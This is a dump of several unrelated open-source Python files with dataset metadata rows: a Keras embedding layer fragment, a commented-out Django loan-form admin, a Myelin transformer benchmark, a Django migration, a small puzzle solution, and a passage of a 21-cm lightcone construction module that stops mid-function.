super().__init__(filepath, vocab, expand_vocab, lowercase, input_dim, output_dim, unk, normalize,
embeddings_initializer, embeddings_regularizer, activity_regularizer, embeddings_constraint,
mask_zero, input_length, name, **kwargs)
def call(self, inputs):
assert inputs.dtype == tf.string, \
f'Expect tf.string but got tf.{inputs.dtype.name}. {inputs}' \
f'Please pass tf.{inputs.dtype.name} in.'
inputs = self.vocab.lookup(inputs)
# inputs._keras_mask = tf.not_equal(inputs, self.vocab.pad_idx)
return super().call(inputs)
def compute_mask(self, inputs, mask=None):
if not self.mask_zero:
return None
return tf.not_equal(inputs, self.vocab.pad_token)
| 42.15736 | 119 | 0.624925 |
d7819266695791964a62614eefc8322a5120926d | 6,683 | py | Python | src/loanforms/admin.py | Deepak27004/carecoop | 01229c1f9d1c89e595d7f4ca62a07e780522118b | [
"MIT"
] | null | null | null | src/loanforms/admin.py | Deepak27004/carecoop | 01229c1f9d1c89e595d7f4ca62a07e780522118b | [
"MIT"
] | null | null | null | src/loanforms/admin.py | Deepak27004/carecoop | 01229c1f9d1c89e595d7f4ca62a07e780522118b | [
"MIT"
] | 5 | 2017-11-06T14:15:19.000Z | 2020-10-02T14:51:37.000Z | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.contrib import admin
# from .models import (PersonalInformation, LoanApplication, LoanPaymentShareContribution, OutStandingLoans,
# Security, Declaration, ReviewedByCoOperativeManager,
# LoanAnalysisAndApprovalByLoans, NameSignatureDate)
# class PersonalInformationAdmin(admin.ModelAdmin):
# list_display = ['name','organisation','member_number','employee_number','email_address','telephone','physical_address',
# 'postal_address','length_of_membership','nrc_number']
# class Meta:
# model = PersonalInformation
# admin.site.register(PersonalInformation, PersonalInformationAdmin)
# class LoanApplicationAdmin(admin.ModelAdmin):
# list_display = ['amount_applied_for','amount_in_words','period_repayment','purposes_for_the_loan']
# class Meta:
# model = LoanApplication
# admin.site.register(LoanApplication, LoanApplicationAdmin)
# class LoanPaymentShareContributionAdmin(admin.ModelAdmin):
# list_display = ['period_of_repayment','monthly_principal_deduction','monthly_interest_deduction',
# 'monthly_share_contribution','total_care_coop_deduction']
# class Meta:
# model = LoanPaymentShareContribution
# admin.site.register(LoanPaymentShareContribution, LoanPaymentShareContributionAdmin)
#
# from .models import (PersonalInformation, LoanApplication, LoanPaymentShareContribution, OutStandingLoans,
# Security, Declaration, ReviewedByCoOperativeManager,
# LoanAnalysisAndApprovalByLoans, NameSignatureDate)
#
# class PersonalInformationAdmin(admin.ModelAdmin):
# list_display = ['name','organisation','member_number','employee_number','email_address','telephone','physical_address',
# 'postal_address','length_of_membership','nrc_number']
#
# class Meta:
# model = PersonalInformation
#
# admin.site.register(PersonalInformation, PersonalInformationAdmin)
#
# class LoanApplicationAdmin(admin.ModelAdmin):
# list_display = ['amount_applied_for','amount_in_words','period_repayment','purposes_for_the_loan']
#
# class Meta:
# model = LoanApplication
#
# admin.site.register(LoanApplication, LoanApplicationAdmin)
#
# class LoanPaymentShareContributionAdmin(admin.ModelAdmin):
# list_display = ['period_of_repayment','monthly_principal_deduction','monthly_interest_deduction',
# 'monthly_share_contribution','total_care_coop_deduction']
#
# class Meta:
# model = LoanPaymentShareContribution
#
# admin.site.register(LoanPaymentShareContribution, LoanPaymentShareContributionAdmin)
#
# class OutStandingLoansAdmin(admin.ModelAdmin):
# list_display = ['premium_loan_amount','premium_balance','premium_monthly_repayment',
# 'ordinary_loan_amount','ordinary_balance','ordinary_monthly_repayment',
# 'rental_plus_loan_amount','rental_plus_balance','rental_plus_monthly_repayment',
# 'education_loan_amount','education_balance','education_monthly_repayment',
# 'emergency_loan_amount','emergency_balance','emergency_monthly_repayment',
# 'family_holiday_loan_amount','family_holiday_balance','family_holiday_monthly_repayment',
# 'commodity_loan_amount','commodity_balance','commodity_monthly_repayment',
# 'building_loan_amount','building_balance','building_monthly_repayment',
# 'land_purchase_loan_amount','land_purchase_balance','land_purchase_monthly_repayment',
# 'care_coop_land_loan_amount','care_coop_land_balance','care_coop_land_monthly_repayment',
# 'vehicle_loan_amount','vehicle_balance','vehicle_monthly_repayment',
# 'vehicle_insurance_loan_amount','vehicle_insurance_balance','vehicle_insurance_monthly_repayment',
# 'share_financing_loan_amount','share_financing_balance','share_financing_monthly_repayment',
# 'home_improvement_loan_amount','home_improvement_balance','home_improvement_monthly_repayment']
# class Meta:
# model = OutStandingLoans
# admin.site.register(OutStandingLoans, OutStandingLoansAdmin)
# class SecurityAdmin(admin.ModelAdmin):
# list_display = ['total_shares','terminal_benefits_accured','total','signaturea','signatureb','datea','dateb']
# class Meta:
# model = Security
# admin.site.register(Security, SecurityAdmin)
# class DeclarationAdmin(admin.ModelAdmin):
# list_display = ['applicant_name','datea','signature','dateb','bank_name','account_no',
# 'branch','cheque','bank_transfer']
# class Meta:
# model = Declaration
# admin.site.register(Declaration, DeclarationAdmin)
# class ReviewedByCoOperativeManagerAdmin(admin.ModelAdmin):
# list_display = ['name','date','signature']
# class Meta:
# model = ReviewedByCoOperativeManager
# admin.site.register(ReviewedByCoOperativeManager, ReviewedByCoOperativeManagerAdmin)
#
# class Meta:
# model = OutStandingLoans
#
# admin.site.register(OutStandingLoans, OutStandingLoansAdmin)
#
# class SecurityAdmin(admin.ModelAdmin):
# list_display = ['total_shares','terminal_benefits_accured','total','signaturea','signatureb','datea','dateb']
#
# class Meta:
#
# model = Security
#
# admin.site.register(Security, SecurityAdmin)
#
#
# class DeclarationAdmin(admin.ModelAdmin):
# list_display = ['applicant_name','datea','signature','dateb','bank_name','account_no',
# 'branch','cheque','bank_transfer']
#
# class Meta:
# model = Declaration
#
# admin.site.register(Declaration, DeclarationAdmin)
#
# class ReviewedByCoOperativeManagerAdmin(admin.ModelAdmin):
# list_display = ['name','date','signature']
#
# class Meta:
# model = ReviewedByCoOperativeManager
#
# admin.site.register(ReviewedByCoOperativeManager, ReviewedByCoOperativeManagerAdmin)
#
# class LoanAnalysisAndApprovalByLoansAdmin(admin.ModelAdmin):
# list_display = ['comments','chair_person_name','chair_person_signature','chair_person_date',
# 'Treasurer_name','Treasurer_signature','Treasurer_date',
# 'committee_member_name','committee_member_signature','committee_member_date']
# class Meta:
# model = LoanAnalysisAndApprovalByLoans
# admin.site.register(LoanAnalysisAndApprovalByLoans, LoanAnalysisAndApprovalByLoansAdmin)
# class NameSignatureDateAdmin(admin.ModelAdmin):
# list_display = ['name','signature','date']
# class Meta:
# model = NameSignatureDate
#
# admin.site.register(LoanAnalysisAndApprovalByLoans, LoanAnalysisAndApprovalByLoansAdmin)
#
# class NameSignatureDateAdmin(admin.ModelAdmin):
# list_display = ['name','signature','date']
#
# class Meta:
# model = NameSignatureDate
#
# admin.site.register(NameSignatureDate, NameSignatureDateAdmin)
# # class SuccessStoriesAdmin(admin.ModelAdmin):
# # list_display = ['message','name','carecoopnumber','','','','']
# # Register your models here.
# Register your models here.
| 36.519126 | 122 | 0.781984 |
27811d5c9f1561995664152fd1fa51cd0da8321f | 7,876 | py | Python | sling/myelin/tests/transformer.py | anysql/sling | d521b27f1537608ddf3d8b4281edd585ffd90545 | [
"Apache-2.0"
] | 97 | 2020-03-11T07:44:05.000Z | 2022-03-27T14:24:15.000Z | sling/myelin/tests/transformer.py | anysql/sling | d521b27f1537608ddf3d8b4281edd585ffd90545 | [
"Apache-2.0"
] | 11 | 2020-10-23T09:26:26.000Z | 2021-08-25T09:31:28.000Z | sling/myelin/tests/transformer.py | anysql/sling | d521b27f1537608ddf3d8b4281edd585ffd90545 | [
"Apache-2.0"
] | 8 | 2018-06-11T07:59:18.000Z | 2021-06-09T09:19:05.000Z | """Myelin flow definition for Transformer model."""
import numpy as np
import sling.myelin as myelin
import sling.myelin.simulator as simulator
import sling.flags as flags
flags.define('--repeat', default=1, type=int)
flags.define('--flow')
class TransformerLayer:
"""Builds a flow graph for single transformer layer."""
def __init__(self, f, hidden_size, filter_size, seq_length, num_heads):
self._f = f
self._hidden_size = hidden_size
self._filter_size = filter_size
self._seq_length = seq_length
self._num_heads = num_heads
self._depth = hidden_size // num_heads
def layer_norm(self, x, epsilon=1e-6):
f = self._f
scale = f.array('layer_norm_scale',
np.random.randn(self._hidden_size).astype(np.float32))
bias = f.array('layer_norm_bias',
np.random.randn(self._hidden_size).astype(np.float32))
# Computes: tf.reduce_mean(x, axis=[-1], keepdims=True)
mean = f.mean(x, axis=-1, keepdims=True)
# Computes: tf.reduce_mean(tf.square(x - mean), axis=[-1], keepdims=True)
variance = f.mean(f.square(f.sub(x, mean)), axis=-1, keepdims=True)
# Computes: (x - mean) * tf.rsqrt(variance + epsilon)
norm_x = f.mul(f.sub(x, mean),
f.div(1.0, f.sqrt(f.add(variance, epsilon))))
return f.add(f.mul(norm_x, scale), bias)
def self_attention_layer(self, x):
"""Computes self-attention."""
def _split_heads(x):
"""Split x into different heads, and transpose the resulting value.
The tensor is transposed to insure the inner dimensions hold the correct
values during the matrix multiplication.
Args:
x: A tensor with shape [seq_length, hidden_size]
Returns:
A tensor with shape [num_heads, seq_length, hidden_size/num_heads]
"""
f = self._f
x = f.reshape(x, [self._seq_length, self._num_heads, self._depth])
return f.transpose(x, [1, 0, 2])
def _combine_heads(x):
"""Combine tensor that has been split.
Args:
x: A tensor [num_heads, length, hidden_size/num_heads]
Returns:
A tensor with shape [length, hidden_size]
"""
x = f.transpose(x, [1, 0, 2]) # --> [length, num_heads, depth]
return f.reshape(x, [self._seq_length, self._hidden_size])
f = self._f
q_dense_layer = f.array(
'q', np.random.randn(
self._hidden_size, self._hidden_size).astype(np.float32))
k_dense_layer = f.array(
'k', np.random.randn(
self._hidden_size, self._hidden_size).astype(np.float32))
v_dense_layer = f.array(
'v', np.random.randn(
self._hidden_size, self._hidden_size).astype(np.float32))
output_dense_layer = f.array(
'o', np.random.randn(
self._hidden_size, self._hidden_size).astype(np.float32))
# Linearly project the query (q), key (k) and value (v) using different
# learned projections. This is in preparation of splitting them into
# multiple heads. Multi-head attention uses multiple queries, keys, and
# values rather than regular attention (which uses a single q, k, v).
# Output: [seq_length, hidden_size].
q = f.matmul(x, q_dense_layer)
k = f.matmul(x, k_dense_layer)
v = f.matmul(x, v_dense_layer)
# Split q, k, v into heads.
# Output: [num_heads, seq_length, depth].
q = _split_heads(q)
k = _split_heads(k)
v = _split_heads(v)
q = f.mul(q, self._depth ** -0.5)
# Eq: logits = tf.matmul(q, k, transpose_b=True)
# Logits is supposed to be [num_heads, seq_length, seq_length]
k = f.transpose(k, [0, 2, 1])
logits = f.matmul(q, k) # batched matmul
# We won't need bias if we work with batch_size = 1
# logits = f.add(logits, bias)
weights = f.softmax(logits, name='attention_weights')
# Output: [num_heads, seq_length, depth]
attention_output = f.matmul(weights, v) # batched matmul
# Output: [seq_length, hidden_dim]
attention_output = _combine_heads(attention_output)
# Do linear projection.
# Output: [seq_length, hidden_dim]
attention_output = f.matmul(attention_output, output_dense_layer)
return attention_output
def postprocess_wrapper(self, layer_input, layer):
# LayerNorm.
layer_input_norm = self.layer_norm(layer_input)
# Self-attention.
attention_output = layer(layer_input_norm)
# Skip-connection.
output = self._f.add(attention_output, layer_input)
return output
def feed_forward_layer(self, x):
"""Computes feed-forward Transformer layer.
First transforms the input to filter_size and then down-scales to
hidden_dim.
"""
f = self._f
def _ff(x, input_dim, output_dim):
w = f.array('w',
np.random.randn(input_dim, output_dim).astype(np.float32))
b = f.array('b', np.random.randn(output_dim).astype(np.float32))
return f.add(f.matmul(x, w), b)
# Output: [seq_length, filter_size]
filter_output = f.relu(_ff(x, self._hidden_size, self._filter_size))
# Output: [seq_length, hidden_size]
# was: output = _ff(filter_output, self._hidden_size, self._hidden_size)
output = _ff(filter_output, self._filter_size, self._hidden_size)
return output
def build_flow(self, layer_input):
# Self-attention + LayerNorm+Skip.
# Output: [seq_length, hidden_dim]
self_attn_output = self.postprocess_wrapper(layer_input,
self.self_attention_layer)
# Feed-forward + LayerNorm+Skip.
# Output: [seq_length, hidden_dim]
ff_output = self.postprocess_wrapper(self_attn_output,
self.feed_forward_layer)
# LayerNorm+Skip.
final_output = self.layer_norm(ff_output)
return final_output
flags.parse()
flow = myelin.Flow()
f = myelin.Builder(flow, 'f')
seq_length = 128
hidden_size = 256
num_layers = 3
num_heads = 8
filter_size = hidden_size * 4
vocab_size = 32000
num_segment_ids = 5
input_ids = f.var('input_ids', myelin.DT_INT32, [seq_length])
segment_ids = f.var('segment_ids', myelin.DT_INT32, [seq_length])
wpe_embedding = f.array(
'wpe_embedding',
np.random.randn(vocab_size, hidden_size).astype(np.float32))
segment_embeddings = f.array(
'segment_embeddings',
np.random.randn(num_segment_ids, hidden_size).astype(np.float32))
positional_embeddings = f.array(
'positional_embeddings',
np.random.randn(seq_length, hidden_size).astype(np.float32))
input_ids_emb = f.gather(wpe_embedding, input_ids)
input_segment_ids_emb = f.gather(segment_embeddings, segment_ids)
# Output: [seq_length, hidden_size]
layer_input = f.add(input_ids_emb,
f.add(input_segment_ids_emb, positional_embeddings))
for _ in range(num_layers):
transformer = TransformerLayer(
f, hidden_size, filter_size, seq_length, num_heads)
layer_output = transformer.build_flow(layer_input)
layer_input = layer_output
f.rename(layer_output, 'output')
if flags.arg.flow:
flow.save(flags.arg.flow)
# Compile flow to network.
compiler = myelin.Compiler()
net = compiler.compile(flow)
cell = net.cell(f.func.name)
data = cell.instance()
baseline = simulator.compute(flow, f.func, data)
# Profile network.
print('Testing transformer layers:', num_layers, 'length:', seq_length,
'hidden:', hidden_size, 'filter:', filter_size, 'heads:', num_heads)
for n in range(flags.arg.repeat):
data.clear()
data.compute()
if flags.arg.profile:
print(net.profile())
# Compare output of network to NumPy baseline.
baseline_output = baseline[layer_output]
test_output = np.array(data[layer_output])
if np.allclose(baseline_output, test_output, atol=1e-4):
print("Baseline comparison: SUCCESS")
else:
print("Baseline comparison: FAIL")
print("baseline:");
print(baseline_output)
print("test:");
print(test_output)
| 31.630522 | 78 | 0.677628 |
67dfd815d056f597c992ac967d7c352183f84b92 | 3,963 | py | Python | api/migrations/0111_externalpartner_externalpartnercategory_fieldreportexternalpartner_fieldreportexternalpartnercategor.py | IFRCGo/ifrcgo-api | c1c3e0cf1076ab48d03db6aaf7a00f8485ca9e1a | [
"MIT"
] | 11 | 2018-06-11T06:05:12.000Z | 2022-03-25T09:31:44.000Z | api/migrations/0111_externalpartner_externalpartnercategory_fieldreportexternalpartner_fieldreportexternalpartnercategor.py | IFRCGo/ifrcgo-api | c1c3e0cf1076ab48d03db6aaf7a00f8485ca9e1a | [
"MIT"
] | 498 | 2017-11-07T21:20:13.000Z | 2022-03-31T14:37:18.000Z | api/migrations/0111_externalpartner_externalpartnercategory_fieldreportexternalpartner_fieldreportexternalpartnercategor.py | IFRCGo/ifrcgo-api | c1c3e0cf1076ab48d03db6aaf7a00f8485ca9e1a | [
"MIT"
] | 6 | 2018-04-11T13:29:50.000Z | 2020-07-16T16:52:11.000Z | # Generated by Django 2.2.13 on 2021-02-02 18:11
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('api', '0110_auto_20210202_0950'),
]
operations = [
migrations.CreateModel(
name='ExternalPartner',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=200, verbose_name='name')),
],
options={
'verbose_name': 'external partner',
'verbose_name_plural': 'external partners',
},
),
migrations.CreateModel(
name='ExternalPartnerCategory',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=200, verbose_name='name')),
],
options={
'verbose_name': 'external partner category',
'verbose_name_plural': 'external partner caregories',
},
),
migrations.CreateModel(
name='SupportedActivity',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=200, verbose_name='name')),
],
options={
'verbose_name': 'supported activity',
'verbose_name_plural': 'supported activities',
},
),
migrations.CreateModel(
name='FieldReportSupportedActivity',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('field_report', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='supportedactivities', to='api.FieldReport', verbose_name='field report')),
('supported_activities', models.ManyToManyField(blank=True, to='api.SupportedActivity', verbose_name='supported activities')),
],
options={
'verbose_name': 'field report supported activities',
'verbose_name_plural': 'field report supported activities',
},
),
migrations.CreateModel(
name='FieldReportExternalPartnerCategory',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('external_partner_categories', models.ManyToManyField(blank=True, to='api.ExternalPartnerCategory', verbose_name='external partner categories')),
('field_report', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='externalpartnercategories', to='api.FieldReport', verbose_name='field report')),
],
options={
'verbose_name': 'field report external partner categories',
'verbose_name_plural': 'field report external partner categories',
},
),
migrations.CreateModel(
name='FieldReportExternalPartner',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('external_partners', models.ManyToManyField(blank=True, to='api.ExternalPartner', verbose_name='external partners')),
('field_report', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='externalpartners', to='api.FieldReport', verbose_name='field report')),
],
options={
'verbose_name': 'field report external partners',
'verbose_name_plural': 'field report external partners',
},
),
]
| 47.178571 | 190 | 0.597275 |
e6b3ca041aac71420aebd0db0fc4f030fcc371c2 | 327 | py | Python | 30 Days of Code/day26_nested_logic.py | quqixun/Hackerrank_Python | 024084a5a77878ce2b4b99d731be28b221f58e41 | [
"MIT"
] | 1 | 2018-11-12T01:48:22.000Z | 2018-11-12T01:48:22.000Z | Algorithm/Implementation/library_fine.py | quqixun/Hackerrank_Python | 024084a5a77878ce2b4b99d731be28b221f58e41 | [
"MIT"
] | null | null | null | Algorithm/Implementation/library_fine.py | quqixun/Hackerrank_Python | 024084a5a77878ce2b4b99d731be28b221f58e41 | [
"MIT"
] | null | null | null | #!/bin/python3
import sys
ad, am, ay = map(int, input().strip().split(" "))
ed, em, ey = map(int, input().strip().split(" "))
hackos = 0
if ay == ey:
if am == em:
if ad > ed:
hackos = 15 * (ad - ed)
elif am > em:
hackos = 500 * (am - em)
elif ay > ey:
hackos = 10000
print(hackos)
| 15.571429 | 49 | 0.492355 |
56e6e179440414f3cb564000e6d35fbe167f46cc | 18,177 | py | Python | t2c/lightcone.py | dprelogo/tools21cm | 760ae64dc1aea8b03d270fd473161c577dff874d | [
"MIT"
] | null | null | null | t2c/lightcone.py | dprelogo/tools21cm | 760ae64dc1aea8b03d270fd473161c577dff874d | [
"MIT"
] | null | null | null | t2c/lightcone.py | dprelogo/tools21cm | 760ae64dc1aea8b03d270fd473161c577dff874d | [
"MIT"
] | null | null | null | '''
Methods to construct lightcones.
'''
from . import const, conv
import numpy as np
import os, glob
from .helper_functions import get_mesh_size, \
determine_redshift_from_filename, get_data_and_type, print_msg, find_idx
from .density_file import DensityFile
from .vel_file import VelocityFile
from . import cosmology as cm
from . import statistics as st
from . import smoothing
import scipy.interpolate
def make_lightcone(filenames, z_low = None, z_high = None, file_redshifts = None, \
cbin_bits = 32, cbin_order = 'c', los_axis = 0, raw_density = False, interpolation='linear'):
'''
Make a lightcone from xfrac, density or dT data. Replaces freq_box.
Parameters:
filenames (string or array): The coeval cubes.
Can be either any of the following:
- An array with the file names
- A text file containing the file names
- The directory containing the files (must only contain one type of files)
z_low (float): the lowest redshift. If not given, the redshift of the
lowest-z coeval cube is used.
z_high (float): the highest redshift. If not given, the redshift of the
highest-z coeval cube is used.
file_redshifts (string or array): The redshifts of the coeval cubes.
Can be any of the following types:
- None: determine the redshifts from file names
- array: array containing the redshift of each coeval cube
- filename: the name of a data file to read the redshifts from
cbin_bits (int): If the data files are in cbin format, you may specify
the number of bits.
cbin_order (char): If the data files are in cbin format, you may specify
the order of the data.
los_axis (int): the axis to use as line-of-sight for the coeval cubes
raw_density (bool): if this is true, and the data is a
density file, the raw (simulation units) density will be returned
instead of the density in cgs units
interpolation (string): can be 'linear', 'step', 'sigmoid' or
'step_cell'.
Determines how slices in between output redshifts are interpolated.
Returns:
(lightcone, z) tuple
- lightcone is the lightcone volume where the first two axes have the same size as the input cubes
- z is an array containing the redshifts along the line-of-sight
.. note::
If z_low is given, that redshift will be the lowest one included,
even if there is no coeval box at exactly that redshift. This can
give results that are subtly different from results calculated with
the old freq_box routine.
'''
if not interpolation in ['linear', 'step', 'sigmoid', 'step_cell']:
raise ValueError('Unknown interpolation type: %s' % interpolation)
#Figure out output redshifts, file names and size of output
filenames = _get_filenames(filenames)
file_redshifts = _get_file_redshifts(file_redshifts, filenames)
assert len(file_redshifts) == len(filenames)
mesh_size = get_mesh_size(filenames[0])
output_z = _get_output_z(file_redshifts, z_low, z_high, mesh_size[0])
#Make the output 32-bit to save memory
lightcone = np.zeros((mesh_size[0], mesh_size[1], len(output_z)), dtype='float32')
comoving_pos_idx = 0
z_bracket_low = None; z_bracket_high = None
data_low = None; data_high = None
#Make the lightcone, one slice at a time
print_msg('Making lightcone between %f < z < %f' % (output_z.min(), output_z.max()))
for z in output_z:
z_bracket_low_new = file_redshifts[file_redshifts <= z].max()
z_bracket_high_new = file_redshifts[file_redshifts > z].min()
#Do we need a new file for the low z?
if z_bracket_low_new != z_bracket_low:
z_bracket_low = z_bracket_low_new
file_idx = np.argmin(np.abs(file_redshifts - z_bracket_low))
if data_high is None:
data_low, datatype = get_data_and_type(filenames[file_idx], cbin_bits, cbin_order, raw_density)
else: #No need to read the file again
data_low = data_high
#Do we need a new file for the high z?
if z_bracket_high_new != z_bracket_high:
z_bracket_high = z_bracket_high_new
file_idx = np.argmin(np.abs(file_redshifts - z_bracket_high))
data_high, datatype = get_data_and_type(filenames[file_idx], cbin_bits, cbin_order, raw_density)
#Make the slice by interpolating, then move to next index
data_interp = _get_interp_slice(data_high, data_low, z_bracket_high, \
z_bracket_low, z, comoving_pos_idx, los_axis, interpolation)
lightcone[:,:,comoving_pos_idx] = data_interp
comoving_pos_idx += 1
return lightcone, output_z
def make_velocity_lightcone(vel_filenames, dens_filenames, z_low = None, \
z_high = None, file_redshifts = None, los_axis = 0):
'''
Make a lightcone from velocity data. Since velocity files contain momentum
rather than actual velocity, you must specify filenames for both velocity
and density.
Parameters:
vel_filenames (string or array): The coeval velocity cubes.
Can be any of the following:
- An array with the file names
- A text file containing the file names
- The directory containing the files (must only contain one type of files)
dens_filenames (string or array): The coeval density cubes.
Same format as vel_filenames.
z_low (float): the lowest redshift. If not given, the redshift of the
lowest-z coeval cube is used.
z_high (float): the highest redshift. If not given, the redshift of the
highest-z coeval cube is used.
file_redshifts (string or array): The redshifts of the coeval cubes.
Can be any of the following types:
- None: determine the redshifts from file names
- array: array containing the redshift of each coeval cube
- filename: the name of a data file to read the redshifts from
los_axis (int): the axis to use as line-of-sight for the coeval cubes
Returns:
(lightcone, z) tuple
- lightcone is the lightcone volume where the first two axes have the same size as the input cubes
- z is an array containing the redshifts along the line-of-sight
'''
dens_filenames = _get_filenames(dens_filenames)
file_redshifts = _get_file_redshifts(file_redshifts, dens_filenames)
vel_filenames = _get_filenames(vel_filenames)
assert(len(file_redshifts) == len(vel_filenames))
assert(len(vel_filenames) == len(dens_filenames))
mesh_size = get_mesh_size(dens_filenames[0])
output_z = _get_output_z(file_redshifts, z_low, z_high, mesh_size[0])
lightcone = np.zeros((3, mesh_size[0], mesh_size[1], len(output_z)), dtype='float32')
comoving_pos_idx = 0
z_bracket_low = None; z_bracket_high = None
for z in output_z:
z_bracket_low_new = file_redshifts[file_redshifts <= z].max()
z_bracket_high_new = file_redshifts[file_redshifts > z].min()
if z_bracket_low_new != z_bracket_low:
z_bracket_low = z_bracket_low_new
file_idx = np.argmin(np.abs(file_redshifts - z_bracket_low))
dfile = DensityFile(dens_filenames[file_idx])
vel_file = VelocityFile(vel_filenames[file_idx])
data_low = vel_file.get_kms_from_density(dfile)
del dfile
del vel_file
if z_bracket_high_new != z_bracket_high:
z_bracket_high = z_bracket_high_new
file_idx = np.argmin(np.abs(file_redshifts - z_bracket_high))
dfile = DensityFile(dens_filenames[file_idx])
vel_file = VelocityFile(vel_filenames[file_idx])
data_high = vel_file.get_kms_from_density(dfile)
del dfile
del vel_file
data_interp = _get_interp_slice(data_high, data_low, z_bracket_high, \
z_bracket_low, z, comoving_pos_idx, los_axis)
lightcone[:,:,:,comoving_pos_idx] = data_interp
comoving_pos_idx += 1
return lightcone, output_z
def _get_output_z(file_redshifts, z_low, z_high, box_grid_n):
'''
Determine the output redshifts. For internal use.
'''
if z_low is None:
z_low = file_redshifts.min()
if z_high is None:
z_high = file_redshifts.max()
output_z = redshifts_at_equal_comoving_distance(z_low, z_high, box_grid_n)
if min(output_z) < min(file_redshifts) or max(output_z) > max(file_redshifts):
print('Warning! You have specified a redshift range of %.3f < z < %.3f' % (min(output_z), max(output_z)))
print('but you only have files for the range %.3f < z < %.3f.' % (min(file_redshifts), max(file_redshifts)))
print('The redshift range will be truncated.')
output_z = output_z[output_z >= min(file_redshifts)]
output_z = output_z[output_z <= max(file_redshifts)]
if len(output_z) < 1:
raise Exception('No valid redshifts in range!')
return output_z
def redshifts_at_equal_comoving_distance(z_low, z_high, box_grid_n=256, \
box_length_mpc=None):
'''
Make a frequency axis vector with equal spacing in co-moving LOS coordinates.
The comoving distance between each frequency will be the same as the cell
size of the box.
Parameters:
z_low (float): The lower redshift
z_high (float): The upper redhisft
box_grid_n = 256 (int): the number of slices in an input box
box_length_mpc (float): the size of the box in cMpc. If None,
set to conv.LB
Returns:
numpy array containing the redshifts
'''
if box_length_mpc is None:
box_length_mpc = conv.LB
assert(z_high > z_low)
z = z_low
z_array = []
while z < z_high:
z_array.append(z)
nu = const.nu0/(1.0+z)
dnu = const.nu0*const.Hz(z)*box_length_mpc/(1.0 + z)**2/const.c/float(box_grid_n)
z = const.nu0/(nu - dnu) - 1.0
return np.array(z_array)
def get_lightcone_subvolume(lightcone, redshifts, central_z, \
depth_mhz=None, depth_mpc=None, odd_num_cells=True, \
subtract_mean=True, fov_Mpc=None):
'''
Extract a subvolume from a lightcone, at a given central redshift,
and with a given depth. The depth can be specified in Mpc or MHz.
You must give exactly one of these parameters.
Parameters:
ligthcone (numpy array): the lightcone
redshifts (numpy array): the redshifts along the LOS
central_z (float): the central redshift of the subvolume
depth_mhz (float): the depth of the subvolume in MHz
depth_mpc (float): the depth of the subvolume in Mpc
odd_num_cells (bool): if true, the depth of the box will always
be an odd number of cells. This avoids problems with
power spectrum calculations.
subtract_mean (bool): if true, subtract the mean of the signal (Default: True)
fov_Mpc (float): the FoV size in Mpc
Returns:
Tuple with (subvolume, dims) where dims is a tuple
with the dimensions of the subvolume in Mpc
'''
assert len(np.nonzero([depth_mhz, depth_mpc])) == 1
if fov_Mpc is None:
fov_Mpc = conv.LB
central_nu = cm.z_to_nu(central_z)
if depth_mpc != None: #Depth is given in Mpc
central_dist = cm.nu_to_cdist(central_nu)
low_z = cm.cdist_to_z(central_dist-depth_mpc/2.)
high_z = cm.cdist_to_z(central_dist+depth_mpc/2.)
else: #Depth is given in MHz
low_z = cm.nu_to_z(central_nu+depth_mhz/2.)
high_z = cm.nu_to_z(central_nu-depth_mhz/2.)
if low_z < redshifts.min():
raise Exception('Lowest z is outside range')
if high_z > redshifts.max():
raise Exception('Highest z is outside range')
low_n = int(find_idx(redshifts, low_z))
high_n = int(find_idx(redshifts, high_z))
if (high_n-low_n) % 2 == 0 and odd_num_cells:
high_n += 1
subbox = lightcone[:,:,low_n:high_n]
if subtract_mean:
subbox = st.subtract_mean_signal(subbox, los_axis=2)
box_depth = float(subbox.shape[2])/lightcone.shape[1]*fov_Mpc
box_dims = (fov_Mpc, fov_Mpc, box_depth)
return subbox, box_dims
def _get_interp_slice(data_high, data_low, z_bracket_high, z_bracket_low, z, \
comoving_pos_idx, los_axis, interpolation='linear'):
'''
Interpolate between two data slices. For internal use.
'''
slice_ind = comoving_pos_idx % data_low.shape[1]
slice_low = _get_slice(data_low, slice_ind, los_axis)
slice_high = _get_slice(data_high, slice_ind, los_axis)
if interpolation == 'linear':
slice_interp = ((z-z_bracket_low)*slice_high + \
(z_bracket_high - z)*slice_low)/(z_bracket_high-z_bracket_low)
elif interpolation == 'step':
transition_z = (z_bracket_high-z_bracket_low)/2.
if z < transition_z:
slice_interp = slice_low.copy()
else:
slice_interp = slice_high.copy()
elif interpolation == 'sigmoid':
zp = -10. + 20.*(z-z_bracket_low)/(z_bracket_high-z_bracket_low)
beta = 2.
g = 1./(1.+np.exp(-beta*zp))
slice_interp = slice_low*(1.-g) + slice_high*g
elif interpolation == 'step_cell':
slice_interp = _get_step_weighted_slice(slice_low, slice_high, z_bracket_high, z_bracket_low, z)
else:
raise Exception('Unknown interpolation method: %s' % interpolation)
return slice_interp
def _get_step_weighted_slice(slice_low, slice_high, z_bracket_high, z_bracket_low, z):
'''
Interpolate using a step function where the step position is based
on the proximity to an ionized region
'''
smoothed = smoothing.smooth_gauss(slice_high, sigma=4.)
diff = np.abs(slice_high-slice_low)
#smoothed=1 means early transition. smoothed=0 means late
#smoothed -= changed_cells.min()
#smoothed /= (changed_cells.max()-changed_cells.min())
step_transitions = _get_step_transitions(smoothed, diff>1.e-3)
step_transitions = z_bracket_low + step_transitions*(z_bracket_high-z_bracket_low)
interp_slice = slice_high.copy()
interp_slice[z < step_transitions] = slice_low[z < step_transitions]
return interp_slice
def _get_step_transitions(cell_dist, diff_idx):
#Replace each value in cell_dist with the number of cells
#with a lower value. Then normalize to be between 0 and 1
values_flat = cell_dist[diff_idx].flatten()
values_sorted = sorted(values_flat+np.random.random(len(values_flat))*1.e-9)
